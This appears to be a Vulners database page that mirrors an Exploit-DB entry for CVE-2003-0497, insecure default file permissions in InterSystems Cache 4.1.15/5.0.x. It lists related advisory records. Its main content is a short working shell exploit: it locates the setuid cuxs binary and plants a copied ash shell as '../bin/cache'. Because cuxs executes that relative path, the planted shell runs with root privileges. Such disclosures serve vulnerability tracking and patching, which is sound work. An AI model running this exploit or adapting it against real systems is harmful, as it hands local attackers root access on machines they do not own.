Lucene search
+L

InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions

🗓️ 01 Jul 2003 00:00:00Reported by Larry W. CashdollarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Insecure default permissions in InterSystems Cache allow local attackers to overwrite files.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-0497
4 Jul 200304:00
cve
cvelist
Cvelist
CVE-2003-0497
4 Jul 200304:00
cvelist
euvd
EUVD
EUVD-2003-0491
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-0497
7 Aug 200304:00
nvd
packetstorm
Packet Storm
intersystems.txt
3 Jul 200300:00
packetstorm
securityvulns
securityvulns
[Full-Disclosure] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions
2 Jul 200300:00
securityvulns
source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.00788
34